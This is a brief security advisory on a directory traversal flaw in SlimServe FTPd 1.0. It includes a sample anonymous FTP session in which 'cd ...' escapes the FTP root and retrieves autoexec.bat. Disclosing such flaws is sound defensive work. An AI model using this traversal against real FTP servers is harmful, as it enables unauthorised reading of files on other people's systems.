COMMAND

    SlimServe FTPd

SYSTEMS AFFECTED

    SlimServe FTPd 1.0

PROBLEM

    Joe Testa found  following.  A  vulnerability exists which  allows
    an attacker  to break  out of  the ftp  root using  relative paths
    (ie:  '...').

    The following is an illustration of  the problem.  An ftp root  of
    "c:\directory\directory" was used.

        % ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
        220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
        User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
        230 User anonymous logged in, proceed.
        ftp> cd ...
        250 CWD command successful.
        ftp> get autoexec.bat
        200 PORT command successful.
        150 Opening data connection for "/.../autoexec.bat".
        250 RETR command successful.
        ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
        ftp>

SOLUTION

    No quick fix is possible.  Vemdor has been informed.